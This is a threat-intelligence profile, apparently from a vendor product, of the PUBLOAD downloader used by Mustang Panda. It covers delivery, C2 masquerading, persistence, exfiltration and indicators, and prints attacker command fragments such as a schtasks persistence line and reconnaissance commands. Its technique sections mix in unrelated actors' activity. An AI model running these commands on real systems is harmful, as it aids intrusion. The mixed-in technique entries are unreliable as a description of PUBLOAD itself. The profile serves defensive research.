PUBLOAD
PUBLOAD is a downloader/stager malware family associated with the China-linked threat actor Mustang Panda, also tracked as Stately Taurus, and described in some reporting as unique to that cluster. It has been observed since at least early 2022 in cyber-espionage campaigns targeting government entities in the Asia-Pacific region, including Southeast Asian governments and members of the Tibetan community. Typical delivery chains use spear-phishing or DLL sideloading; observed lures included ZIP archives containing a legitimate executable such as Talking_Points_for_China.exe that sideloaded a malicious DLL such as KeyScramblerIE.dll, and a legitimate signed executable loading a PUBLOAD DLL such as BrMod104.dll. PUBLOAD has also been propagated via removable media through the HIUPAN/USBFect worm, enabling lateral movement across endpoints via infected USB drives.
Functionally, PUBLOAD acts as a first-stage downloader/backdoor that communicates with command-and-control infrastructure to retrieve additional shellcode-based payloads and has been used to deliver PlugX as well as supplemental Mustang Panda tooling including FDMTP and PTSOCKET. Variants use either HTTP or TCP for C2. HTTP-based samples sent POST requests masquerading as Microsoft Windows Update traffic, including fake Windows Update-style URL paths such as /v11/2/windowsupdate/redir/v6-winsp1-wuredir and host fields such as www.asia.microsoft.com; one sample communicated directly with 123.253.32[.]15, and related infrastructure included www.fjke5oe[.]com and update.fjke5oe[.]com. TCP-based variants sent host data using obfuscated fake TLS-like headers after XOR-based encryption. Reported host reconnaissance includes gathering running services with tasklist, collecting system information such as volume details, computer names, usernames, and system tick counts, and checking connectivity with commands including tracert -h 5 -4 google.com and curl http://myip.ipip.net.
Additional observed behavior includes persistence via scheduled tasks, including creation of a task named Microsoft_Licensing using schtasks.exe /F /Create /TN Microsoft_Licensing /sc minute /MO 1 ..., and use of valid legitimate digital signatures and certificates to evade detection. Some reporting states PUBLOAD can harvest document files with extensions including .doc, .docx, .xls, .xlsx, .pdf, .ppt, and .pptx, compress targeted files into RAR archives, and exfiltrate them with curl to an attacker-controlled FTP site. Related indicators and artifacts directly mentioned in the content include BrMod104.dll (SHA256: 2a00d95b658e11ca71a8de532999dd33ddee7f80432653427eaa885b611ddd87), the malicious DLL KeyScramblerIE.dll, the scheduled task name Microsoft_Licensing, the IP 123.253.32[.]15, and domains such as www.fjke5oe[.]com, update.fjke5oe[.]com, and www.openservername.com.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The earlier Stately Taurus attacks delivered the PubLoad malware and used the DLL sideloading technique to execute the malware... This malicious payload is a variant of PubLoad, which is stager malware that communicates with its command and control (C2) server to obtain a second shellcode-based payload.
UNK_SteadySplit is a user of the custom TONESHELL and PUBLOAD malware families, alongside multiple other first-stage malware families delivered in phishing campaigns.
Techniques & procedures
30 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
4 techniques
Initial Access
Mustang Panda notably utilized the USBFect worm to propagate PUBLOAD via infected USB drives, enabling lateral movement and data exfiltration.
Mustang Panda, also called Camaro Dragon, Earth Preta, and Stately Taurus, is believed to have targeted entities in Myanmar, the Philippines, Japan and Singapore, targeting them with phishing emails designed to deliver two malware packages.
Execution
7 techniques
Execution
“Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.” / “APT29 used scheduler and schtasks to create new tasks on remote host as part of their lateral movement… updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration.”
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
facilitate two active reverse shells in parallel... Yokai, a backdoor that sets up a reverse shell to execute arbitrary commands.
During the 2016 Ukraine Electric Power Attack, Sandworm Team used the xp_cmdshell command in MS-SQL. During the 2025 Poland Wiper Attacks, the adversaries leveraged PsExec to run cmd.exe commands on multiple victim machines. Numerous malware families and groups are described as using cmd.exe, cmd /c, Windows command shell, or command-line interfaces to execute commands, payloads, reconnaissance, persistence, cleanup, and ransomware actions.
"BOOKWORM ... execution on the heap is initiated through callback function of legitimate API functions such as EnumChildWindows or EnumSystemLanguageGroupsA"; "CLAIMLOADER ... run its shellcode through the callback function"; "PUBLOAD stager leveraged Windows API functions with callback ... to bypass anti-virus monitoring"
"...a malicious archive with a document-spoofing executable, which launches the Claimloader DLL..."
This sophisticated malware utilizes Dynamic Link Library (DLL) sideloading techniques to execute malicious payloads... In a notable instance, the malware exploited a legitimate executable signed by an automation organization to load a malicious payload identified as BrMod104.dll.
Persistence
3 techniques
Persistence
“Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.” / “APT29 used scheduler and schtasks to create new tasks on remote host as part of their lateral movement… updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration.”
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, .lnk files, or .bat files in the Windows Startup folder.
Privilege Escalation
3 techniques
Privilege Escalation
“Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.” / “APT29 used scheduler and schtasks to create new tasks on remote host as part of their lateral movement… updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration.”
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, .lnk files, or .bat files in the Windows Startup folder.
Stealth
6 techniques
Stealth
The content repeatedly describes malware and threat actors using obfuscated code, encrypted strings, Base64/XOR/RC4/AES encoding, VMProtect/ConfuserEx/SmartAssembly, stack strings, control-flow flattening, opaque predicates, and hidden payloads to evade analysis and detection.
The HTTP request includes www.asia.microsoft.com within the host field as an attempt to masquerade as a legitimate request associated with the Windows operating system. Also, the URL pattern seen in these HTTP requests appears to be an attempt to mimic legitimate URLs accessed by Windows update.
Akira has used legitimate names and locations for files to evade defenses.
The content repeatedly describes malware and threat actors decoding, decrypting, or deobfuscating payloads, strings, configuration data, commands, and C2 traffic prior to execution or use, e.g., 'APT28 macro uses the command certutil -decode to decode contents of a .txt file storing the base64 encoded payload' and 'Action RAT can use Base64 to decode actor-controlled C2 server communications.'
The malware copies its components to a working directory... These components include: A legitimate parent process ClaimLoader itself
This sophisticated malware utilizes Dynamic Link Library (DLL) sideloading techniques to execute malicious payloads... In a notable instance, the malware exploited a legitimate executable signed by an automation organization to load a malicious payload identified as BrMod104.dll.
Defense Impairment
1 technique
Defense Impairment
The content repeatedly describes threat actors and malware using valid, stolen, forged, self-signed, or abused code-signing certificates to sign malware and appear legitimate, including examples such as AppleJeus using a valid digital signature from Sectigo, APT41 leveraging code-signing certificates, FIN7 signing Carbanak payloads, and SUNBURST being digitally signed by SolarWinds.
Discovery
4 techniques
Discovery
The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.
The content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."
"Bazar can query the Registry for installed applications." / "BRONZE BUTLER has used tools to enumerate software installed on an infected host." / "LightSpy ... enumerate the Applications folder to collect the bundle name, bundle identifier, and version information..." / "Volt Typhoon has queried the Registry on compromised systems for information on installed software."
Multiple malware families (e.g., Avaddon, Bazar, Clop, Ryuk, REvil, LockBit, Zeus Panda) check OS language/keyboard layout/locale and terminate or alter execution if the system matches excluded languages (commonly Russian/CIS) or does not match desired target languages (e.g., Spanish/Portuguese, Arabic, Persian).
Lateral Movement
2 techniques
Lateral Movement
Collection
2 techniques
Collection
PUBLOAD is equipped with features to conduct reconnaissance of the infected network and harvest files of interest (.doc, .docx, .xls, .xlsx, .pdf, .ppt, and .pptx) ... PlugX then takes care of deploying another bespoke file collector called FILESAC that can collect the victim's files.
Command and Control
3 techniques
Command and Control
Variants of PUBLOAD use either HTTP or TCP for command-and-control (C2) communications. The sample we observed is a variant that uses TCP... Masol RAT... communicates with its C2 servers over HTTP POST... This malware uses Google Remote Procedure Call (gRPC) for C2 communication.
This particular PubLoad payload communicates with its C2 server by directly connecting to the IP address 123.253.32[.]15. The payload then issues an HTTP request... The HTTP request includes www.asia.microsoft.com within the host field as an attempt to masquerade as a legitimate request associated with the Windows operating system.
Exfiltration
2 techniques
Exfiltration
PUBLOAD collected and exfiltrated critical system information... over TCP with obfuscated TLS-like headers
The captured information is compressed into an RAR archive and exfiltrated to an attacker-controlled FTP site via cURL. Alternatively, Mustang Panda has also been observed deploying a custom program named PTSOCKET that can transfer files in multi-thread mode.
IOCs tracked for this family
13 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
41 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Referenced as part of Mustang Panda's evolving malware/tooling ecosystem.
A named malware/tool repeatedly deployed by the Mustang Panda cluster in recent attacks.
Malware used in the campaign and propagated by USBFect via infected USB drives to support lateral movement and data exfiltration.
Malware used by Stately Taurus/Mustang Panda, propagated via infected USB drives. It collected and exfiltrated system information over TCP using obfuscated TLS-like headers and supported persistent access.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.